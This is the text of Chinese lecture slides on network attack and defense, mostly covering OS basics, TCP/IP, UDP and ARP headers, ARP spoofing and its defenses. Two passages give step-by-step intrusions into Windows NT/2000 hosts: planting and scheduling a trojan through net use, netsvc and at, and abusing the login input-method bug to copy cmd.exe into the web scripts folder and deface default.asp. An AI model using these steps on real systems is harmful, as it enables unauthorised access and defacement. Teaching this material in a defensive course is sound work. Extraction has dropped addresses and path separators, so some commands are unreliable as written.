網(wǎng)絡(luò)攻擊與防御-第一講

1、 網(wǎng)絡(luò)攻擊與防御本節(jié)提要1.網(wǎng)絡(luò)安全概述2.一個網(wǎng)絡(luò)安全有關(guān)的案例3.與網(wǎng)絡(luò)安全有關(guān)的協(xié)議網(wǎng)絡(luò)安全概述網(wǎng)絡(luò)安全定義指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及系統(tǒng)中的數(shù)據(jù)受到保護，不會遭受惡意的破壞、更改和泄漏，系統(tǒng)可以正常的運行網(wǎng)絡(luò)安全概述什么是不安全的網(wǎng)絡(luò)環(huán)境信息丟失信息戰(zhàn)內(nèi)部泄密外部泄密自然災(zāi)害、意外事故計算機犯罪網(wǎng)絡(luò)協(xié)議中的缺陷，例如TCP/IP協(xié)議的缺陷電子諜報，比如信息流量分析、信息竊取等人為行為，比如使用不當，安全意識差等“黑客” 行為，比如非法訪問、非法連接一個關(guān)于網(wǎng)絡(luò)安全的實例一次迅速入侵NT架構(gòu)操作系統(tǒng)的方法操作系統(tǒng)平臺：必須為NT，可以是WINNT4.0或5.0；WorkStation 或S

2、erver；還可以是WIN2000。工具:Netsvc.exe 用于啟動遠程主機的schedule服務(wù)。1.打開DOS窗口，輸入net use ip 連接上目標主機。把木馬上傳到目標主機。建議放在你共享的所在目錄，或系統(tǒng)目錄WINNT下,執(zhí)行時不用再輸入程序所在路徑。木馬都有自我刪除功能，所以一般不會被管理員發(fā)現(xiàn)。上傳木馬后，鍵入:C:/netsvc ip schedule /start啟動目標主機的schedule服務(wù)(schedule服務(wù)用來定時執(zhí)行某程序，我們可利用它來執(zhí)行木馬程序)。這過程可能會持續(xù)較久,一定要等到提示符出現(xiàn)才進行下一步,然后鍵入C:/net time ip將顯示目標主

3、機的系統(tǒng)時間，如：14:43記住這時間，接下來用AT命令往目標主機添加入定時啟動木馬程序的任務(wù)，鍵入：C:/at ip 14:45 trojan.exe注意：這里我啟動時間定為14:45而不是14:43，往后推遲了幾分鐘，這是考慮到命令往返于兩機需要一定的時間至此，你只要等稍等幾分鐘過去，就可以打開你的木馬客戶器控制目標主機了，也不用那么麻煩地執(zhí)行程序啦！入侵分析這次入侵使用了一些DOS系統(tǒng)中的常用命令例如net use ipC:/netsvc ip schedule /startC:/net time ipC:/at ip 14:45 trojan.exe使用了木馬程序Netsvc.exe學(xué)

4、習(xí)網(wǎng)絡(luò)攻擊與防御我們需要哪些知識1.對操作系統(tǒng)的理解2.對網(wǎng)絡(luò)框架與協(xié)議的理解3.常用網(wǎng)絡(luò)命令的掌握4.掌握通過工具捕獲網(wǎng)絡(luò)信息的方法5.對捕獲的網(wǎng)絡(luò)信息有分析能力6.掌握路由器與交換機的工作原理與配置方法7.會設(shè)置防火墻操作系統(tǒng)介紹常用操作系統(tǒng)的架構(gòu)介紹一.基于windowsNT架構(gòu)系統(tǒng)Windows2000server系統(tǒng)特點：1.支持NTFS格式系統(tǒng)文件2. win2000系統(tǒng)支持127位的字符口令3. Active Directory 與 Windows 2000 安全服務(wù)（如 Kerberos 身份驗證協(xié)議、公鑰基本結(jié)構(gòu)、加密文件系統(tǒng) (EFS)、安全性配置管理器、組策略以及委派管理

5、等）緊密集成。說明1.什么是NTFS(New Technology File System) 微軟WindowsNT內(nèi)核的系列操作系統(tǒng)支持的、一個特別為網(wǎng)絡(luò)和磁盤配額、文件加密等管理安全特性設(shè)計的磁盤格式。隨著以NT為內(nèi)核的 Windows2000/XP的普及，很多個人用戶開始用到了NTFS。NTFS也是以簇為單位來存儲數(shù)據(jù)文件，但NTFS中簇的大小并不依賴于磁盤或 分區(qū)的大小。簇尺寸的縮小不但降低了磁盤空間的浪費，還減少了產(chǎn)生磁盤碎片的可能。NTFS支持文件加密管理功能，可為用戶提供更高層次的安全保證。 說明Active Directory是指Windows 2000網(wǎng)絡(luò)中的目錄服務(wù)。它有兩

6、個作用： 1. 目錄服務(wù)功能2.集中式管理 該技術(shù)還可以用來確保只有那些經(jīng)過授權(quán)的用戶或應(yīng)用程序方可獲準在具備安全保障的前提自下針對相關(guān)資源實施訪問調(diào)用。 Unix系統(tǒng)架構(gòu)介紹UNIX ，是一個強大的多用戶、多任務(wù)操作系統(tǒng)，支持多種處理器架構(gòu) unix是基于命令行的操作系統(tǒng) Unix操作系統(tǒng)通常被分成三個主要部分：內(nèi)核（Kernel）、Shell和文件系統(tǒng)。 Unix系統(tǒng)權(quán)限介紹1.讀許可權(quán)2.寫許可權(quán)3.執(zhí)行許可權(quán)Unix基本命令操作舉例（1）首先讓我們在當前目錄下創(chuàng)建兩個目錄dir1，dir2： mkdir dir1 dir2 /輸入命令后記得敲一下回車鍵： （2）進入目錄dir1中創(chuàng)建文

7、件file1，file2： cd dir1 /進入目錄dir1 touch file1 file2 /創(chuàng)建文件file1，file2 （3）再進入目錄dir2中創(chuàng)建文件file3，file4： cd . /返回上一級目錄 cd dir2 /進入目錄dir2 touch file3 file4 /創(chuàng)建文件file3，file4 與DOS命令有些相似Unix常用操作界面網(wǎng)絡(luò)安全概述網(wǎng)絡(luò)安全定義指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及系統(tǒng)中的數(shù)據(jù)受到保護，不會遭受惡意的破壞、更改和泄漏，系統(tǒng)可以正常的運行遠程攻擊與防御基礎(chǔ)介紹Host C 入侵檢測 控制臺 Host B Host A 受保護網(wǎng)絡(luò)IDS主機黑客發(fā)起攻

8、擊驗證報文并采取措施識別出攻擊行為阻斷連接或者報警等發(fā)現(xiàn)響應(yīng)策略InternetInternet返回一次遠程攻擊與防御示意圖分析攻擊的位置遠程攻擊本地攻擊偽遠程攻擊簡單拒絕服務(wù)本地用戶非法獲得權(quán)限遠程用戶非法獲得權(quán)限攻擊分類主動攻擊被動攻擊常見攻擊手段竊聽（鍵擊記錄、網(wǎng)絡(luò)監(jiān)聽）欺騙（獲取口令、惡意代碼）拒絕服務(wù)（資源耗盡）數(shù)據(jù)驅(qū)動攻擊（緩沖區(qū)溢出、漏洞攻擊）網(wǎng)絡(luò)防御系統(tǒng)體系結(jié)構(gòu)預(yù)警保護檢測響應(yīng)恢復(fù)反擊網(wǎng)絡(luò)安全通信協(xié)議總部分支機構(gòu)移動用戶 INTERNET安全整體解決方案客戶端防病毒與客戶端VPN軟件入侵檢測與服務(wù)器防病毒防火墻或VPN網(wǎng)關(guān)網(wǎng)絡(luò)協(xié)議的進一步討論Tcp/Ip協(xié)議分析TCP協(xié)議報頭格

9、式分析通過網(wǎng)絡(luò)分析儀捕獲的協(xié)議實例Tcp數(shù)據(jù)段如下Source port:5973 /源端口Destination port:23 /目的端口Sequence number:1456389907 /序列號Ack number:1242056456 /確認號Offset:5 /報頭長度Reserved: %000000 /保留Code: %011000 /代碼位Ack is valid Push request Window: 61320 /窗口Checksum: 0 x61a6 /校驗和Urgent pointer: 0 / 緊急指針No tcp options /選項Tcp data are

10、a: /數(shù)據(jù)Vl.5.+.5.+.5. 76 4c 19 35 11 2b 19Frame check sequence:0 x0d0000f網(wǎng)絡(luò)協(xié)議的進一步討論Tcp/Ip協(xié)議分析Ip協(xié)議報頭格式網(wǎng)絡(luò)協(xié)議的進一步討論分析：版本 ：ip版本號首部長度：32位長度服務(wù)類型：說明數(shù)據(jù)如何被處理長度：報頭與數(shù)據(jù)的長度認證：唯一的ip數(shù)據(jù)包值標志：說明是否有數(shù)據(jù)被分片段偏移量：數(shù)據(jù)在裝入時太大，需要進行分段與重組TTL: 是指一個數(shù)據(jù)包被發(fā)送時規(guī)定的一個時間值協(xié)議：上層協(xié)議端口，tcp是6H，UDP是17H校驗和：檢測報頭的循環(huán)冗余碼源地址：發(fā)送站的32位地址目的地址：接收站的32位地址選項：用于網(wǎng)絡(luò)

11、調(diào)試，檢測通過網(wǎng)絡(luò)分析儀捕獲的協(xié)議實例IP Header - Internet Protocol Datagram Version: 4 / 版本號 Header Length: 5 /首部長度 Precedence: 0 /優(yōu)先級 Type of Service: %000 服務(wù)類型 Unused: %00 未使用 Total Length: 187 總長度 Identifier: 22486 認證 Fragmentation Flags: %010 Do Not Fragment /是否有分片（碎片） Fragment Offset: 0 / 段開銷 Time To Live: 60 /生

12、存周期 IP Type: 0 x06 TCP / 協(xié)議 此處表示6H TCP Header Checksem: 0 xd031 /報頭校驗 Source IP Address: 0 Dest. IP Address: 0 No Internet Datagram Options /無選項 在ip協(xié)議字段可能出現(xiàn)的協(xié)議號協(xié)議 協(xié)議號ICMP 1IGRP 9EIGRP 88OSPF 89IPV6 41GRE 47 UDP協(xié)議網(wǎng)絡(luò)協(xié)議的進一步討論源端口 ：發(fā)送數(shù)據(jù)主機的端口號目的端口 ：目的主機上請求應(yīng)用程序的端口號長度： udp報頭與udp數(shù)據(jù)的長度校驗和: 報頭與數(shù)據(jù)字段兩者的校驗和數(shù)據(jù)：上層的

13、數(shù)據(jù)通過網(wǎng)絡(luò)分析儀捕獲的協(xié)議實例UDP - User Datagram Protocol Source Port: 1085 /源端口 Destination Port: 5136 /目的端口 Length: 41 /長度 Checksum: 0 x7a3c /校驗 UDP Data Area: .Z. 00 01 5a 96 00 01 00 00 00 00 00 11 00 00 00.C.2._C._C 2e 03 00 43 02 1e 32 0a 00 0a 00 80 43 00 80Frame Check Sequence: 0 x00000000關(guān)于端口的討論&傳輸層的協(xié)議討

14、論端口：tcp與UDP必須使用端口號來與其他上層進行通信不同的端口號實現(xiàn)了不同的會話過程在應(yīng)用層中對應(yīng)的不同端口號應(yīng)用層 傳輸層協(xié)議 端口號FTP TCP 21TELNET TCP 23 DNS TCP/UDP 53TFTP UDP 69POP3 UDP 110低于1024的端口號有rfc3232確定高于1024的端口號及1024端口號被上層用來建立主機與其他主機的會話傳輸層上TCP與UDP協(xié)議的比較TCP關(guān)鍵字(排序、可靠、面向連接、虛電路、三方握手、窗口流量控制)、UDP關(guān)鍵字(無序、不可靠、無連接、低開銷、無確認、沒有窗口或流量控制) 一次利用端口與windows2000漏洞進行攻擊的實

15、例攻擊目的：侵入安裝windows2000網(wǎng)絡(luò)服務(wù)器的主機，獲得網(wǎng)站資料并篡改網(wǎng)頁內(nèi)容攻擊步驟：利用WINDOW輸入法漏洞1、用端口掃瞄程序掃IP的3389端口，得到xx.xx.xx.xx。 2、運行windows2000終端客戶程序，在服務(wù)器輸入框里填入：xx.xx.xx.xx ，連接。 3、出現(xiàn)windows2000的登陸窗口，按下CTRL+SHIFT鍵，出現(xiàn)全拼輸入法。一次利用端口與windows2000漏洞進行攻擊的實例4、在輸入法狀態(tài)條上按mouse右鍵，選擇幫助，選擇輸入指南，選擇選項按右鍵。 5、選擇跳轉(zhuǎn)到URL，輸入：c:winntsystem32cmd.exe. 6、選擇保存

16、到磁盤。 7、選擇目錄：c:inetpubscripts 8、打開IE，輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c: （知道了吧） 9、輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+c:inetpubwwwrootdefault.aspARP協(xié)議與RARP協(xié)議的進一步討論地址解析協(xié)議ARP概述圖例：通過網(wǎng)絡(luò)分析儀捕獲的協(xié)議實例Packet Length: 64 Timestamp: 09:17:29 03/17/10Ethernet Header Destination: FF:FF:FF:FF:FF:FF /

17、這是一個廣播地址 Source: 00:A0:24:48:60:A5 Protocol Type: 0 x0806 IP ARPARP - Address Resolution Protocol Hardware: 1 Ethernet (10Mb) Protocol: 0 x0800 IP Hardware Address Length: 6 Protocol Address Length: 4 Operation: 1 ARP Request Sender Hardware Address: 00:A0:24:48:60:A5 Sender Internet Address: Target

18、 Hardware Address: 00:00:00:00:00:00 (ignored) Target Internet Address: 0ARP就是已知主機的IP地址在網(wǎng)絡(luò)上查找到它的MAC地址的協(xié)議一次利用ARP協(xié)議的攻擊ARP欺騙原理 每臺安裝有TCP/IP協(xié)議的電腦里都有一個ARP緩存表，表里的IP地址與MAC地址是一一對應(yīng)的，如下表所示。主機 IP地址 MAC地址A aa-aa-aa-aa-aa-aaB bb-bb-bb-bb-bb-bbC cc-cc-cc-cc-cc-ccD dd-dd-dd-dd-dd-dd一次利用ARP協(xié)議的攻擊ARP協(xié)議的基礎(chǔ)就是信任局域網(wǎng)內(nèi)所有的人，

19、那么就很容易實現(xiàn)在以太網(wǎng)上的ARP欺騙。對目標A進行欺騙，A去Ping主機C卻發(fā)送到了DD-DD- DD-DD-DD-DD這個地址上。如果進行欺騙的時候，把C的MAC地址騙為DD-DD-DD-DD-DD-DD，于是A發(fā)送到C上的數(shù)據(jù)包都變成發(fā)送 給D的了。這不正好是D能夠接收到A發(fā)送的數(shù)據(jù)包了么。 如何防范ARP攻擊ARP攻擊后的癥狀A(yù)RP的發(fā)現(xiàn)：ARP的通病就是掉線，在掉線的基礎(chǔ)上可以通過以下幾種方式判 別，1.一般情況下不需要處理1分鐘之內(nèi)就可以回復(fù)正常上網(wǎng)。因為ARP欺騙是由時限，過了期限就會自動的回復(fù)正常。而且現(xiàn)在大多數(shù)路由器都會在很短時間 內(nèi)不停廣播自己的正確ARP，使受騙的機器回復(fù)

20、正常。但是如果出現(xiàn)攻擊性ARP欺騙（其實就是時間很短的量很大的欺騙ARP，1秒有個幾百上千的），他是 不斷的通過非常大量ARP欺騙來阻止內(nèi)網(wǎng)機器上網(wǎng)，即使路由器不斷廣播正確的包也會被他大量的錯誤信息給淹沒。2.打開被騙機器的DOS界面，輸入ARP -A命令會看到相關(guān)的ARP表，通過看到的網(wǎng)關(guān)的MAC地址可以去判別是否出現(xiàn)ARP欺騙，但是由于時限性，這個工作必須在機器回復(fù)正常之前完成。如果出 現(xiàn)欺騙問題，ARP表里面會出現(xiàn)錯誤的網(wǎng)關(guān)MAC地址，和真實的網(wǎng)關(guān)MAC進行對比如何防范ARP攻擊1. 在PC上綁定路由器的IP和MAC地址：1)首先，獲得路由器的內(nèi)網(wǎng)的MAC地址(例如HiPER網(wǎng)關(guān)地址54

21、的MAC地址為0022aa0022aa局域網(wǎng) 端口MAC地址)。2)編寫一個批處理文件rarp.bat內(nèi)容如下：echo offarp -darp -s 54 00-22-aa-00-22-aa將文件中的網(wǎng)關(guān)IP地址和MAC地址更改為您自己的網(wǎng)關(guān)IP地址和MAC地址即可。將這個批處理軟件拖到“windows-開始-程序-啟動”中。2. 在路由器上綁定用戶主機的IP和MAC地址(440以后的路由器軟件版本支持) ICMP協(xié)議的討論該協(xié)議工作在網(wǎng)絡(luò)層屬于一個管理型協(xié)議icmp（因特網(wǎng)控制報文協(xié)議）協(xié)議負責(zé)為IP提供路由信息與有無差錯情況典型應(yīng)用ping該協(xié)議使用ip協(xié)議進行封裝通過網(wǎng)絡(luò)分析儀捕獲的協(xié)議實例捕獲完整的協(xié)議數(shù)據(jù)內(nèi)容Flags: 0 x00 Status: 0 x00 Packet Length: 78 Timestamp: 14:04:25.967000 12/20/03 Ethernet Header Destination: 00:a0:24:6e:0f:a8 Source: 00:80:c7:a8:f0:3d Ether-Type: 08-00 IP通過網(wǎng)絡(luò)分析儀捕獲的協(xié)議實例IP Header - Internet Protocol Datgram Versio